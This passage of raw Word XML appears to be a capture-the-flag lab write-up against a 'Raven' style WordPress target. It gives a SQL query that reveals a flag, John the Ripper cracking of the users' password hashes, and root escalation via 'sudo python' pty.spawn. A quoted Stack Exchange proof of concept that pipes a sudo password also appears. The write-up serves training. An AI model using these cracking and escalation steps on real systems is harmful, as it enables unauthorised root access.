        <w:rPr>
          <w:rStyle w:val="k"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="o"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="n"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>wp_posts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidR="003D2A2E" w:rsidRPr="003D2A2E">
        <w:t>flag3{afc01ab56b50591e7dccf93122770cd2}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF6408" w:rsidRDefault="00FF6408" w:rsidP="00510FDA"/>
    <w:p w:rsidR="00510FDA" w:rsidRDefault="00510FDA" w:rsidP="00510FDA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="31680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-johntheripper-target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DA" w:rsidRDefault="00D85E3F" w:rsidP="00510FDA">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="00C72ABB">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00FF6408" w:rsidRPr="00FF6408">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Linux tool John the Ripper can be used to attempt to crack the password hashes for michael and steven.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF6408" w:rsidRPr="00210D28" w:rsidRDefault="00FF6408" w:rsidP="00510FDA">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="nv"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">john wp_hashes.txt </w:t>
      </w:r>
      <w:r w:rsidRPr="00210D28">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t>(Where the two user password hashes are placed in the aforementioned file.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00510FDA" w:rsidRDefault="00510FDA" w:rsidP="00510FDA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="3189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-rooting-raven-target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DA" w:rsidRDefault="00D85E3F" w:rsidP="00510FDA">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidR="00C72ABB">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003D2A2E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00067AFE" w:rsidRPr="00210D28">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Programmatic Privilege Escalation</w:t>
      </w:r>
      <w:r w:rsidR="00067AFE">
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
      <w:r w:rsidR="00210D28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00067AFE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D2A2E">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>flag4{715dea6c055b9fe3337544932f2941ce}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00067AFE" w:rsidRPr="00067AFE" w:rsidRDefault="00067AFE" w:rsidP="00510FDA">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00067AFE">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Traditional &lt;sudo –s&gt; is not allowed since user steven doesn’t have admin rights. But an attempt to be root is possible with a PYTHON command. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00067AFE" w:rsidRDefault="00067AFE" w:rsidP="00067AFE">
      <w:r>
        <w:t>$ sudo python -c 'import pty;pty.spawn("/bin/bash");'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00067AFE" w:rsidRDefault="00067AFE" w:rsidP="00067AFE">
      <w:r>
        <w:t>root@TARGET1:/ &gt; cd /root &amp;&amp; cat flag4.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00067AFE" w:rsidRDefault="00067AFE" w:rsidP="00510FDA">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00510FDA" w:rsidRDefault="00774AD4" w:rsidP="00510FDA">
      <w:r w:rsidRPr="00067AFE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MORE ON USING PYTHON TO ESCALATE PRIVILEGE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (from </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="196AD4"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>security.stackexchange.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00510FDA" w:rsidRPr="00510FDA" w:rsidRDefault="00774AD4" w:rsidP="00510FDA"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“…sudo id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sudo: sorry, you must have a tty to run sudo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To get around this, let's try a typical PTY upgrade using Python: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echo -e "sudo id\nshudo" | python -c 'import pty;pty.spawn("/bin/bash")'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There's probably a way to do it with the -S option, but it's not needed. This spawns a new PTY to run /bin/bash, which receives the sudo command and password as standard in.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Here's the output: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echo -e "sudo id\nshudo" | python -c 'import pty;pty.spawn("/bin/bash")'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shudo@mymachine:/tmp$ sudo id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[sudo] password for shudo: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uid=0(root) gid=0(root) groups=0(root)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You can see the new shell is spawned, sudo is executed, and the command is run as root! Note that this did leave my shell in a bad state since stdin is tied to the pipe, but it should be sufficient for a PoC.”</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00510FDA" w:rsidRPr="00510F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5B341D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="96B2C89E"/>
    <w:lvl w:ilvl="0" w:tplc="0BAAD14C">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="12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46AD16B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0A62B764"/>
    <w:lvl w:ilvl="0" w:tplc="F738A06E">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9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4DFF65A4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="76BEFA2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A72661"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B3804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7A27E2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6546BD60"/>
    <w:lvl w:ilvl="0" w:tplc="FF96C4EE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AA7"/>
    <w:rsid w:val="00067AFE"/>
    <w:rsid w:val="000A1F73"/>
    <w:rsid w:val="000B4B11"/>
    <w:rsid w:val="00105AA7"/>
    <w:rsid w:val="00126544"/>
    <w:rsid w:val="001B2F09"/>
    <w:rsid w:val="001E709B"/>
    <w:rsid w:val="00210D28"/>
    <w:rsid w:val="00215E76"/>
    <w:rsid w:val="00297AE5"/>
    <w:rsid w:val="00314519"/>
    <w:rsid w:val="003D2A2E"/>
    <w:rsid w:val="003E7F25"/>
    <w:rsid w:val="003F111A"/>
    <w:rsid w:val="004617F8"/>
    <w:rsid w:val="00496667"/>
    <w:rsid w:val="00510FDA"/>
    <w:rsid w:val="006938B2"/>
    <w:rsid w:val="00774AD4"/>
    <w:rsid w:val="007E2BD1"/>
    <w:rsid w:val="008310DB"/>
    <w:rsid w:val="00924AC5"/>
    <w:rsid w:val="00A12617"/>
    <w:rsid w:val="00A674F1"/>
    <w:rsid w:val="00C72ABB"/>
    <w:rsid w:val="00CB20FC"/>
    <w:rsid w:val="00D84080"/>
    <w:rsid w:val="00D85E3F"/>
    <w:rsid w:val="00D950DE"/>
    <w:rsid w:val="00DF7C1C"/>
    <w:rsid w:val="00E24976"/>
    <w:rsid w:val="00EB5401"/>
    <w:rsid w:val="00EE1107"/>
    <w:rsid w:val="00F626D5"/>
    <w:rsid w:val="00FF6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E87A7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DE070B3D-DE67-482A-A5D2-1CE94315B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E7F2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126544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126544"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="o">
    <w:name w:val="o"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006938B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74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74F1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A674F1"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nv">
    <w:name w:val="nv"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A674F1"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c">
    <w:name w:val="c"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A674F1"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nb">
    <w:name w:val="nb"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00A674F1"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00774AD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72AB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C72AB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E7F25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ite">
    <w:name w:val="HTML Cite"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003E7F25"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hgkelc">
    <w:name w:val="hgkelc"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00EB5401"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kx21rb">
    <w:name w:val="kx21rb"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00EB5401"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="dyjrff">
    <w:name w:val="dyjrff"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00EB5401"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="n">
    <w:name w:val="n"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00FF6408"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="k">
    <w:name w:val="k"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00FF6408"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="p">
    <w:name w:val="p"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00FF64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07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3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8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23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188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76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9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9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3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8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35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4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764207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0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54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277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590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99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1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56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72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739363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5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667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351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644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26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7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8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83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044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download.asperasoft.com/download/docs/client/3.5.2/client_admin_linux/webhelp/dita/ssh_server.html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://security.stackexchange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92EAA4-ADF7-4100-91DA-EA5CBD033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10</Pages>
  <Words>873</Words>
  <Characters>4981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14192970887</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>14192970887</cp:lastModifiedBy>
  <cp:revision>25</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-08T02:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-09T18:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>